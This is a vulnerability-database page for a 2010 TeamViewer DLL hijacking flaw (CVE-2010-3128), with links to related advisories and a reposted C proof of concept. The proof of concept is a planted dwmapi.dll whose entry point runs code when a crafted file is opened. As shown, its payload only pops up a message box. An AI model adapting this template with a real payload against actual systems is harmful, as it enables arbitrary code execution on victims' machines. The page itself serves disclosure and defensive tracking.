TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2010-3128 | 26 Aug 201018:00 | – | cve | |
| CVE-2010-3128 | 26 Aug 201018:00 | – | cvelist | |
| EUVD-2010-3128 | 7 Oct 202500:30 | – | euvd | |
| Omron CX-Supervisor | 5 Nov 201900:00 | – | ics | |
| KLA10361 ACE vulnerability in TeamViewer | 26 Aug 201000:00 | – | kaspersky | |
| CVE-2010-3128 | 26 Aug 201018:36 | – | nvd | |
| TeamViewer File Opening Insecure Library Loading Vulnerability | 8 Sep 201000:00 | – | openvas | |
| TeamViewer File Opening Insecure Library Loading Vulnerability | 8 Sep 201000:00 | – | openvas | |
| Design/Logic Flaw | 26 Aug 201018:36 | – | prion | |
| TeamViewer Path Subversion Arbitrary DLL Injection Code Execution | 10 Sep 201000:00 | – | nessus |
/*
Exploit Title: TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: 5.0.8703
Tested on: Windows XP SP3 En
Vulnerable extensions: .tvs .tvc
Greetz: Astalavista, OffSEC, Exploit-DB
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
int dll_hijack()
{
MessageBox(0, "TeamViewer DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Aug 2010 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 29.3
EPSS0.08361